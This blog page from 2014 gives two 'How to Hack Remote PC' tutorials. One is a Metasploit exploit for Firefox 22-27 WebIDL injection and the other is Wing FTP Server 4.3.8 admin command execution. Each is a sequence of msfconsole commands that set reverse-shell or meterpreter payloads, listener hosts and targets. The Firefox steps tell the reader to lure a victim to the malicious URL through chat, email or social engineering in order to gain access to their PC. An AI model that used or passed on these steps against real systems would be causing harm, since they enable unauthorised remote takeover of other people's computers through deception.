Sunday, 14 September 2014

How to Hack Remote Windows, Linux or MAC PC using Firefox WebIDL Privileged Javascript Injection ??



This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox’s Javascript APIs

Exploit Targets:-
Firefox 22-27

Windows XP SP 3

Windows 7

Linux

OSX

Requirement:-
Attacker: kali Linux

Victim PC: Windows 7





*steps* 

1.Open Kali terminal type

     msfconsole

2.Now type
  
    use exploit/multi/browser/firefox_webidl_injection

3.msf exploit (firefox_webidl_injection)>set payload firefox/shell_reverse_tcp

4.msf exploit (firefox_webidl_injection)>set lhost 192.168.0.5 (IP of Local Host)

5.msf exploit (firefox_webidl_injection)>set srvhost 192.168.0.5

6.msf exploit (firefox_webidl_injection)>set uripath /

7.msf exploit (firefox_webidl_injection)>exploit

8.Now an URL you should give to your victim http://192.168.0.5:8080/

Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
Posted by at No comments:

How to Hack Remote Windows PC using Wing FTP Server Authenticated Command Execution ??

This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.

Exploit Targets:-
Wing FTP 4.3.8

Requirements :-
Attacker: kali Linux,backtrack linux

Victim PC: Windows 7

*steps:-*


1.Open Kali terminal type
        msfconsole

2.Now type

 use exploit/windows/ftp/wing_ftp_admin_exec

3.msf exploit (wing_ftp_admin_exec)>set payload windows/meterpreter/reverse_tcp

4.msf exploit (wing_ftp_admin_exec)>set lhost 192.168.0.10 (IP of Local Host)

5.msf exploit (wing_ftp_admin_exec)>set rhost 192.168.0.5 (IP of Remote Host)

6.msf exploit (wing_ftp_admin_exec)>set username rajchandel

7.msf exploit (wing_ftp_admin_exec)>set password ——–

8.msf exploit (wing_ftp_admin_exec)>exploit


That's it
Posted by at 8 comments:
Subscribe to: Comments (Atom)